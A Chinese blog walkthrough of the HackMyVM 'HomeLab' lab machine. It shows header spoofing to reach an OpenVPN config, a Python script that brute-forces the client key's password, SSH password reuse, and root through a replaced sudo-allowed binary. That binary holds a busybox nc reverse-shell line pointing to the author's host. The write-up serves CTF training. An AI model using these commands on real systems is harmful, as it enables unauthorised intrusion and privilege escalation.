Pepster'Blog
HackMyVM-HomeLab-Walkthrough
城南花已开 Lv6
  2025-05-29 08:45:42   2025-06-15 17:23:33    5.1k 字  29 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.202  08:00:27:4c:a5:70       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f3:7c:e9       VMware, Inc.

16 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.065 seconds (123.97 hosts/sec). 4 responded
export ip=192.168.60.202
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.202:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 08:49 CST
Initiating ARP Ping Scan at 08:49
Scanning 192.168.60.202 [1 port]
Completed ARP Ping Scan at 08:49, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:49
Completed Parallel DNS resolution of 1 host. at 08:49, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:49
Scanning 192.168.60.202 [1 port]
Discovered open port 80/tcp on 192.168.60.202
Completed SYN Stealth Scan at 08:49, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.202
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-05-29 08:49:09 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:4C:A5:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

仅仅开放了80端口

目录枚举一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
❯ dirsearch -u $ip

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/Pepster/hmv/reports/_192.168.60.202/_25-05-29_08-49-58.txt

Target: http://192.168.60.202/

[08:49:58] Starting:
[08:49:59] 403 -  277B  - /.ht_wsr.txt
[08:49:59] 403 -  277B  - /.htaccess.bak1
[08:49:59] 403 -  277B  - /.htaccess.orig
[08:49:59] 403 -  277B  - /.htaccess.sample
[08:49:59] 403 -  277B  - /.htaccess.save
[08:49:59] 403 -  277B  - /.htaccess_extra
[08:49:59] 403 -  277B  - /.htaccess_sc
[08:49:59] 403 -  277B  - /.htaccess_orig
[08:49:59] 403 -  277B  - /.htaccessBAK
[08:49:59] 403 -  277B  - /.htaccessOLD
[08:49:59] 403 -  277B  - /.htaccessOLD2
[08:49:59] 403 -  277B  - /.htm
[08:49:59] 403 -  277B  - /.html
[08:49:59] 403 -  277B  - /.htpasswd_test
[08:49:59] 403 -  277B  - /.htpasswds
[08:49:59] 403 -  277B  - /.httr-oauth
[08:50:07] 200 -    1KB - /cgi-bin/test-cgi
[08:50:07] 200 -  820B  - /cgi-bin/printenv
[08:50:10] 200 -    4KB - /error.html
[08:50:11] 200 -    8KB - /favicon.ico
[08:50:21] 301 -  315B  - /script  ->  http://192.168.60.202/script/
[08:50:21] 403 -  277B  - /script/
[08:50:21] 403 -  277B  - /server-status
[08:50:21] 403 -  277B  - /server-status/
[08:50:21] 301 -  316B  - /service  ->  http://192.168.60.202/service/
[08:50:21] 301 -  321B  - /service?Wsdl  ->  http://192.168.60.202/service/?Wsdl
[08:50:23] 301 -  314B  - /style  ->  http://192.168.60.202/style/

浏览器访问一下,发现是Mac OS X Server,UI很复古了🤣

service页面得到提示

1
2
3
❯ curl -s http://192.168.60.202/service/
Whoa! But sorry, this service is only available for myself!%
哇哦!抱歉,这项服务仅限我自己使用!

X-Forwarded-For伪造

猜测可能需要本地访问才可以,添加X-Forwarded-For由于127.0.0.1不行

就尝试了靶机自身的ip,竟发现有回显了

得到疑似openvpn的配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ curl -s "http://192.168.60.202/service/" -H "X-Forwarded-For:$ip"
# Last modified by shinosawa
# on 2024-12-21

# Example Configuration File

client
dev tun
proto udp
remote ? ?
resolv-retry infinite
nobind
persist-key
persist-tun
ca ?
cert ?
# Regenerate a STRONG password for the KEY
# Do NOT use a SAME password as other services et. SSH
# it is DANGEROUS!
key ?
cipher AES-256-GCM
verb 3

不过很多信息被隐去了,需要手工去补全

其中就少了ca cert key

而密钥的后缀为.crt

我们尝试添加作为后缀,重新枚举目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
❯ feroxbuster -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt -x ca -x crt -x key

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.60.202
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt, ca, crt, key]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        5l       27w      226c http://192.168.60.202/style/serverhome_static.css
200      GET       13l       37w     2194c http://192.168.60.202/poweredbymacosxserver.gif
200      GET      192l      384w     3041c http://192.168.60.202/style/iphone.css
200      GET       75l      215w     2241c http://192.168.60.202/script/serverhome.js
200      GET      412l     2178w   136171c http://192.168.60.202/script/compressed_libraries.js
200      GET      351l     1040w    98713c http://192.168.60.202/script/compressed_widgets.js
200      GET      130l      376w     5435c http://192.168.60.202/
301      GET        9l       28w      316c http://192.168.60.202/service => http://192.168.60.202/service/
301      GET        9l       28w      314c http://192.168.60.202/style => http://192.168.60.202/style/
301      GET        9l       28w      318c http://192.168.60.202/style/img => http://192.168.60.202/style/img/
200      GET       20l       22w     1200c http://192.168.60.202/service/ca.crt
200      GET       84l      139w     4492c http://192.168.60.202/service/client.crt
200      GET       30l       36w     1862c http://192.168.60.202/service/client.key
301      GET        9l       28w      315c http://192.168.60.202/script => http://192.168.60.202/script/
[>-------------------] - 9s     51500/5513815 17m     found:14      errors:0
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_60_202-1748481040.state ...
[>-------------------] - 9s     51709/5513815 17m     found:14      errors:0
[>-------------------] - 9s     14650/1102725 1600/s  http://192.168.60.202/
[>-------------------] - 9s     11730/1102725 1337/s  http://192.168.60.202/service/
[>-------------------] - 8s      9355/1102725 1195/s  http://192.168.60.202/style/
[>-------------------] - 8s      9090/1102725 1179/s  http://192.168.60.202/style/img/
[>-------------------] - 5s      6215/1102725 1242/s  http://192.168.60.202/script/

得到三个新的文件ca.crt client.crt client.key

全部下载到本地

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
❯ wget http://192.168.60.202/service/ca.crt
--2025-05-29 09:11:41--  http://192.168.60.202/service/ca.crt
Connecting to 192.168.60.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1200 (1.2K) [application/x-x509-ca-cert]
Saving to: ‘ca.crt’

ca.crt                                100%[=======================================================================>]   1.17K  --.-KB/s    in 0s

2025-05-29 09:11:41 (479 MB/s) - ‘ca.crt’ saved [1200/1200]

❯ wget http://192.168.60.202/service/client.crt
--2025-05-29 09:11:49--  http://192.168.60.202/service/client.crt
Connecting to 192.168.60.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4492 (4.4K) [application/x-x509-ca-cert]
Saving to: ‘client.crt’

client.crt                            100%[=======================================================================>]   4.39K  --.-KB/s    in 0s

2025-05-29 09:11:49 (1.06 GB/s) - ‘client.crt’ saved [4492/4492]

❯ wget http://192.168.60.202/service/client.key
--2025-05-29 09:11:53--  http://192.168.60.202/service/client.key
Connecting to 192.168.60.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1862 (1.8K)
Saving to: ‘client.key’

client.key                            100%[=======================================================================>]   1.82K  --.-KB/s    in 0s

2025-05-29 09:11:53 (666 MB/s) - ‘client.key’ saved [1862/1862]

.ovpn配置文件放置在和私钥文件同一目录下

通常openvpn开放udp1194端口,查看靶机中是否开放

1
2
3
4
5
6
7
8
9
10
11
❯ nmap -sU -sV --version-intensity 0 -n  -T4 $ip -p1194
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 09:17 CST
Nmap scan report for 192.168.60.202
Host is up (0.00039s latency).

PORT     STATE SERVICE VERSION
1194/udp open  openvpn OpenVPN
MAC Address: 08:00:27:4C:A5:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

手动修改配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ curl -s "http://192.168.60.202/service/" -H "X-Forwarded-For:$ip" -o homelab.ovpn
❯ vim homelab.ovpn
# Last modified by shinosawa
# on 2024-12-21

# Example Configuration File

client
dev tun
proto udp
remote 192.168.60.202 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
# 为密钥重新生成一个强密码
# 不要使用与其他服务(例如 SSH)相同的密码
# 这很危险!
key client.key
cipher AES-256-GCM
verb 3

私钥解密

尝试利用openvpn连接一下

显而易见,client.key提示需要输入密码

1
2
3
4
5
6
7
8
9
10
sudo openvpn homelab.ovpn
[sudo] password for Pepster:
2025-05-29 09:19:41 Note: Kernel support for ovpn-dco missing, disabling data channel offload.
2025-05-29 09:19:41 WARNING: file 'client.key' is group or others accessible
2025-05-29 09:19:41 OpenVPN 2.6.12 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-05-29 09:19:41 library versions: OpenSSL 3.4.1 11 Feb 2025, LZO 2.10
2025-05-29 09:19:41 DCO version: N/A
2025-05-29 09:19:41 WARNING: No server certificate verification method has been enabled.  See http://openvpn.net/howto.html#mitm for more info.
Enter Private Key Password: (press TAB for no echo)

只能尝试爆破了,利用-passin paas:参数在命令行中传递密码

作者20206675喜好使用xato-net-10-million-passwords-100000.txt字典

这个稍微快一点

python脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import subprocess
import os

# Configuration
encrypted_key_path = "client.key"
decrypted_key_path = "client_decrypted.key"
password_list_path = "/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt"

print(f"Attempting to decrypt {encrypted_key_path} using passwords from {password_list_path}")

try:
    with open(password_list_path, 'r') as f:
        for line_num, password in enumerate(f, 1):
            password = password.strip() # Remove leading/trailing whitespace including newline
            if not password:
                continue # Skip empty lines

            print(f"Trying password {line_num}: '{password}'")

            # Construct the openssl command
            # -passin pass:PASSWORD is used for direct password input
            # subprocess.run is preferred over os.system or simple backticks for better control
            cmd = [
                "openssl", "rsa",
                "-in", encrypted_key_path,
                "-out", decrypted_key_path,
                "-passin", f"pass:{password}" # Direct password input
            ]

            # Execute the command
            # capture_output=True captures stdout and stderr
            # text=True decodes stdout/stderr as text
            # check=False prevents subprocess.run from raising an exception on non-zero exit codes
            process = subprocess.run(cmd, capture_output=True, text=True, check=False)

            # Check if decryption was successful based on stdout/stderr
            # OpenSSL writes "writing RSA key" to stderr on success
            # Or you can check the exit code directly
            if process.returncode == 0 and "writing RSA key" in process.stderr:
                print(f"\n[SUCCESS] Found password: '{password}'")
                print(f"Decrypted key saved to {decrypted_key_path}")
                break # Stop the loop on success
            elif "bad decrypt" in process.stderr or "digital envelope routines" in process.stderr or "pkcs12 cipherfinal error" in process.stderr:
                # Incorrect password (common errors)
                pass # Just continue to the next password
            else:
                # Other potential errors (e.g., file not found, malformed key)
                print(f"[ERROR] Openssl output for '{password}':")
                print(process.stdout)
                print(process.stderr)
                # You might want to break here if it indicates a critical issue,
                # or continue if it's a transient error.
                # For this specific case, continue if it's not a success and not a common "bad password" error.


except FileNotFoundError:
    print(f"Error: Password list file not found at {password_list_path}")
except Exception as e:
    print(f"An unexpected error occurred: {e}")

finally:
    # Clean up the partially decrypted file if it was created on incorrect password
    # openssl will write a zero-byte file if decryption fails
    if os.path.exists(decrypted_key_path) and os.path.getsize(decrypted_key_path) == 0:
        os.remove(decrypted_key_path)
        print("Removed empty decrypted key file.")

运行一下

1
2
3
4
5
6
❯ python3 brute.py
…………………………
Trying password 23601: 'hiro'

[SUCCESS] Found password: 'hiro'
Decrypted key saved to client_decrypted.key

可以直接连接的时候输入密码,也可以将.opvn配置文件中的key改为client_decrypted.key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
sudo openvpn homelab.ovpn
[sudo] password for Pepster:
2025-05-29 09:35:58 Note: Kernel support for ovpn-dco missing, disabling data channel offload.
2025-05-29 09:35:58 WARNING: file 'client.key' is group or others accessible
2025-05-29 09:35:58 OpenVPN 2.6.12 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2025-05-29 09:35:58 library versions: OpenSSL 3.4.1 11 Feb 2025, LZO 2.10
2025-05-29 09:35:58 DCO version: N/A
2025-05-29 09:35:58 WARNING: No server certificate verification method has been enabled.  See http://openvpn.net/howto.html#mitm for more info.
Enter Private Key Password: ••••
2025-05-29 09:36:03 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2025-05-29 09:36:03 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.60.202:1194
2025-05-29 09:36:03 Socket Buffers: R=[212992->212992] S=[212992->212992]
2025-05-29 09:36:03 UDPv4 link local: (not bound)
2025-05-29 09:36:03 UDPv4 link remote: [AF_INET]192.168.60.202:1194
2025-05-29 09:36:03 TLS: Initial packet from [AF_INET]192.168.60.202:1194, sid=66448eaa 15bfc094
2025-05-29 09:36:03 VERIFY OK: depth=1, CN=My-Home CA
2025-05-29 09:36:03 VERIFY OK: depth=0, CN=server
2025-05-29 09:36:03 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bits RSA, signature: RSA-SHA256, peer temporary key: 253 bits X25519
2025-05-29 09:36:03 [server] Peer Connection Initiated with [AF_INET]192.168.60.202:1194
2025-05-29 09:36:03 TLS: move_session: dest=TM_ACTIVE src=TM_INITIAL reinit_src=1
2025-05-29 09:36:03 TLS: tls_multi_process: initial untrusted session promoted to trusted
2025-05-29 09:36:03 PUSH: Received control message: 'PUSH_REPLY,route 10.176.13.0 255.255.255.0,dhcp-option DNS 8.8.8.8,route-gateway 10.8.0.1,topology subnet,ping 10,ping-restart 120,ifconfig 10.8.0.2 255.255.255.0,peer-id 0,cipher AES-256-GCM,protocol-flags cc-exit tls-ekm dyn-tls-crypt,tun-mtu 1500'
2025-05-29 09:36:03 OPTIONS IMPORT: --ifconfig/up options modified
2025-05-29 09:36:03 OPTIONS IMPORT: route options modified
2025-05-29 09:36:03 OPTIONS IMPORT: route-related options modified
2025-05-29 09:36:03 OPTIONS IMPORT: --ip-win32 and/or --dhcp-option options modified
2025-05-29 09:36:03 OPTIONS IMPORT: tun-mtu set to 1500
2025-05-29 09:36:03 net_route_v4_best_gw query: dst 0.0.0.0
2025-05-29 09:36:03 net_route_v4_best_gw result: via 192.168.60.2 dev eth0
2025-05-29 09:36:03 ROUTE_GATEWAY 192.168.60.2/255.255.255.0 IFACE=eth0 HWADDR=5e:bb:f6:9e:ee:fa
2025-05-29 09:36:03 TUN/TAP device tun0 opened
2025-05-29 09:36:03 net_iface_mtu_set: mtu 1500 for tun0
2025-05-29 09:36:03 net_iface_up: set tun0 up
2025-05-29 09:36:03 net_addr_v4_add: 10.8.0.2/24 dev tun0
2025-05-29 09:36:03 net_route_v4_add: 10.176.13.0/24 via 10.8.0.1 dev [NULL] table 0 metric -1
2025-05-29 09:36:03 Initialization Sequence Completed
2025-05-29 09:36:03 Data Channel: cipher 'AES-256-GCM', peer-id: 0
2025-05-29 09:36:03 Timers: ping 10, ping-restart 120
2025-05-29 09:36:03 Protocol options: protocol-flags cc-exit tls-ekm dyn-tls-crypt

建立TUN隧道了

查看ip,存在TUN0的虚拟网卡,分配的地址为10.8.0.2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 5e:bb:f6:9e:ee:fa brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.100/24 brd 192.168.60.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fd15:4ba5:5a2b:1008::100/64 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::5cbb:f6ff:fe9e:eefa/64 scope link
       valid_lft forever preferred_lft forever
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none
    inet 10.8.0.2/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::2fe5:b231:cfd2:ebd2/64 scope link stable-privacy
       valid_lft forever preferred_lft forever

尝试扫一下此网段下的所有ip

只要10.8.0.1存在,此ip大概是网关

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
❯ fscan -h 10.8.0.1/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.8.0.0-10.8.0.255
[*] 已生成IP范围: 10.8.0.0 - 10.8.0.255
[*] 已解析CIDR 10.8.0.1/24 -> IP范围 10.8.0.0-10.8.0.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 10.8.0.2        存活 (ICMP)
[+] 目标 10.8.0.1        存活 (ICMP)
[+] ICMP存活主机数量: 2
[*] 共解析 218 个有效端口
[+] 端口开放 10.8.0.2:80
[+] 端口开放 10.8.0.1:80
[+] 存活端口数量: 2
[*] 开始漏洞扫描...
[*] 网站标题 http://10.8.0.2           状态码:200 长度:2891   标题:Index of /
[*] 网站标题 http://10.8.0.1           状态码:200 长度:5435   标题:Mac OS X Server
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 6.729460238s

查看路由情况

1
2
3
4
5
6
7
❯ route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         192.168.60.2    0.0.0.0         UG    0      0        0 eth0
10.8.0.0        0.0.0.0         255.255.255.0   U     0      0        0 tun0
10.176.13.0     10.8.0.1        255.255.255.0   UG    0      0        0 tun0
192.168.60.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0

得知访问10.176.13.0网段时会走10.8.0.1网关

其实你也可以从openvpn的连接日志来看

1
2
3
4
5
6
2025-05-29 09:36:03 net_addr_v4_add: 10.8.0.2/24 dev tun0
2025-05-29 09:36:03 net_route_v4_add: 10.176.13.0/24 via 10.8.0.1 dev [NULL] table 0 metric -1
2025-05-29 09:36:03 Initialization Sequence Completed
2025-05-29 09:36:03 Data Channel: cipher 'AES-256-GCM', peer-id: 0
2025-05-29 09:36:03 Timers: ping 10, ping-restart 120
2025-05-29 09:36:03 Protocol options: protocol-flags cc-exit tls-ekm dyn-tls-crypt

再次扫描此网段

10.176.13.37存活,并且开放了22端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
❯ fscan -h 10.176.13.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.176.13.0-10.176.13.255
[*] 已生成IP范围: 10.176.13.0 - 10.176.13.255
[*] 已解析CIDR 10.176.13.0/24 -> IP范围 10.176.13.0-10.176.13.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 10.176.13.37    存活 (ICMP)
[+] ICMP存活主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 10.176.13.37:80
[+] 端口开放 10.176.13.37:22
[+] 存活端口数量: 2
[*] 开始漏洞扫描...
[*] 网站标题 http://10.176.13.37       状态码:200 长度:5435   标题:Mac OS X Server
[!] 扫描错误 10.176.13.37:22 - ssh: handshake failed: EOF
[+] 扫描已完成: 2/2
[*] 扫描结束,耗时: 8.825740272s

用户提权

从上文的.opvn配置文件中的注释信息可以得知ssh的密码大概也是弱密码

猜测密码复用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ ssh [email protected]
[email protected]'s password:

homelab:~$ cat user.flag
flag{38665d1048af82499c6ecbd3c0db3acc}
homelab:~$ sudo -l
Matching Defaults entries for shinosawa on homelab:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for shinosawa:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User shinosawa may run the following commands on homelab:
    (ALL) NOPASSWD: /home/shinosawa/deepseek

Root提权

用户存在sudo权限,可以执行家目录中的程序

既然是家目录下的,删除,新建一个就完事了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
homelab:~$ rm deepseek
rm: remove 'deepseek'? y
homelab:~$ echo "busybox nc 192.168.60.100 4444 -e /bin/ash">deepseek
homelab:~$ chmod +x deepseek
homelab:~$ sudo /home/shinosawa/deepseek
---------------------------
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100 • 10.8.0.2
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from homelab.hmv-192.168.60.202-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/homelab.hmv~192.168.60.202_Linux_x86_64/2025_05_29-09_53_51-597.log 📜
──────────────────────────────────────────────────────────────────────────
/home/shinosawa # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/shinosawa # cat /root/root.flag
flag{e3b081b8af1c7079049b029c7cb8bd0d}

后记

相关配置信息,新建了个虚拟网卡vth0

并分配10.176.13.37同时,ssh配置中只监听10.176.13.37

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
homelab:~$ cat /etc/openvpn/openvpn.conf
port 1194
proto udp
dev tun
ca /etc/openvpn/pki/ca.crt
cert /etc/openvpn/pki/server.crt
key /etc/openvpn/pki/server.key
dh /etc/openvpn/pki/dh.pem
server 10.8.0.0 255.255.255.0
push "route 10.176.13.0 255.255.255.0"
push "dhcp-option DNS 8.8.8.8"
keepalive 10 120
cipher AES-256-GCM
user nobody
group nobody
persist-key
persist-tun
status /var/log/openvpn-status.log
log-append /var/log/openvpn.log
verb 3
topology subnet
homelab:~$ cat /etc/ssh/sshd_config|grep -v "#"|grep " "
Include /etc/ssh/sshd_config.d/*.conf
ListenAddress 10.176.13.37
PermitRootLogin yes
AllowTcpForwarding no
GatewayPorts no
X11Forwarding no
homelab:~$ cat /etc/network/interfaces
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto vth0
iface vth0 inet static
    address 10.176.13.37
    netmask 255.255.255.0
    pre-up ip link add vth0 type dummy
    post-down ip link delete vth0
  1. 信息收集
    1. 服务探测
    2. X-Forwarded-For伪造
    3. 私钥解密
  2. 用户提权
